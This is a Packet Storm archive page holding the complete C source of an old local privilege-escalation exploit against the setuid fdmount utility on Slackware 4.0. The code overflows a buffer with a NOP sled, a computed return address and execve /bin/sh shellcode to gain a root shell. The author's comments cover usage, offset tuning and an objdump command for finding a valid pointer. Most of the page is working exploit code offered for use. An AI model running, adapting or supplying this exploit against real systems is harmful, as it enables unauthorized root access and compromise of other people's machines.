what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

fdmnt-smash.c

fdmnt-smash.c
Posted Apr 3, 2000
Authored by Scrippie | Site b0f.freebsd.lublin.pl

fdmount local root exploit - tested on Slackware 4.0. Must be in the floppy group.

tags | exploit, local, root
systems | linux, slackware
SHA-256 | b9f489398fdfb811cf1ded7dfb08ba23ec8fc414c75571885b29f63112e1ef19

fdmnt-smash.c

Change Mirror Download
/*

Welcome dear reader - be it scriptkiddy, whose sole intent it is to
destroy precious old Unix boxes or Assembly Wizard whose sole intent
it is to correct my code and send me a flame.

The fdutils package contains a setuid root file that is used by the
floppy group to mount and unmount floppies. If you are not in this
group, this exploit will not work.

This thingy was tested on Slackware 4.0 on which it works like a charm.

Use as: fdmount-exp [offset] [buf size] [valid text ptr]

Since the char * text is overwritten in void errmsg(char *text) we
should make sure that this points to a valid address (something in
the .data section should do perfectly). The hard coded one used
works on my box, to find the one you need use something like:

objdump --disassemble-all $(whereis -b fdmount) | grep \<.data\> \
cut -d " " -f1

The HUGE number of nops is needed to make sure this exploit works.
Since it Segfaults out of existence without removing /etc/mtab~ we
only get one try...

Take care with your newly aquired EUID 0!

Cheers go out to: #phreak.nl #hit2000 #root66
The year 2000 scriptkiddie award goed to: Gerrie Mansur
Love goes out to: Hester, Dopey, Maja, Caelum

-- Yours truly,
Scrippie - ronald@grafix.nl - #phreak.nl

*/

#include <stdio.h>

#define NUM_NOPS 500

// Gee, Aleph1 his shellcode is back once more

char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";

unsigned long get_sp(void) {
__asm__("movl %esp, %eax");
}

main(int argc, char **argv)
{
int buf_size = 71;
int offset=0, i;

char *overflow;
char *ovoff;
long addr, ptr=0x0804c7d0;

if(argc>1) offset = atoi(argv[1]);
if(argc>2) buf_size = atoi(argv[2]);
if(argc>3) ptr = strtol(argv[3], (char **) NULL, 16);

printf("##############################################\n");
printf("# fdmount exploit - by Scrippie / #phreak.nl #\n");
printf("##############################################\n");
printf("Using offset: %d\n", offset);
printf("Using buffer size: %d\n", buf_size);
printf("Using 0x%x for \"void errmsg(char *text,...)\" char *text\n", ptr);

if(!(overflow = (char *)malloc(buf_size+16+NUM_NOPS+strlen(shellcode)))) {
fprintf(stderr, "Outta memory - barging out\n");
exit(-1);
}

overflow[0] = '/';
for(i=1;i<buf_size;i++) {
overflow[i] = 0x90;
}

addr = get_sp() - offset;
printf("Resulting address: 0x%x\n", addr);

memcpy(overflow + strlen(overflow), (void *) &addr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);
memcpy(overflow + strlen(overflow), (void *) &ptr, 4);

ovoff = overflow + strlen(overflow);

for(i=0;i<NUM_NOPS;i++) {
*ovoff = 0x90;
*ovoff++;
}

strcpy(ovoff, shellcode);
execl("/usr/bin/fdmount", "fdmount", "fd0", overflow, NULL);
return 0;
}
/* www.hack.co.za */
Login or Register to add favorites

File Archive:

November 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    30 Files
  • 2
    Nov 2nd
    0 Files
  • 3
    Nov 3rd
    0 Files
  • 4
    Nov 4th
    12 Files
  • 5
    Nov 5th
    44 Files
  • 6
    Nov 6th
    18 Files
  • 7
    Nov 7th
    9 Files
  • 8
    Nov 8th
    8 Files
  • 9
    Nov 9th
    3 Files
  • 10
    Nov 10th
    0 Files
  • 11
    Nov 11th
    14 Files
  • 12
    Nov 12th
    20 Files
  • 13
    Nov 13th
    63 Files
  • 14
    Nov 14th
    18 Files
  • 15
    Nov 15th
    8 Files
  • 16
    Nov 16th
    0 Files
  • 17
    Nov 17th
    0 Files
  • 18
    Nov 18th
    0 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    0 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    0 Files
  • 24
    Nov 24th
    0 Files
  • 25
    Nov 25th
    0 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close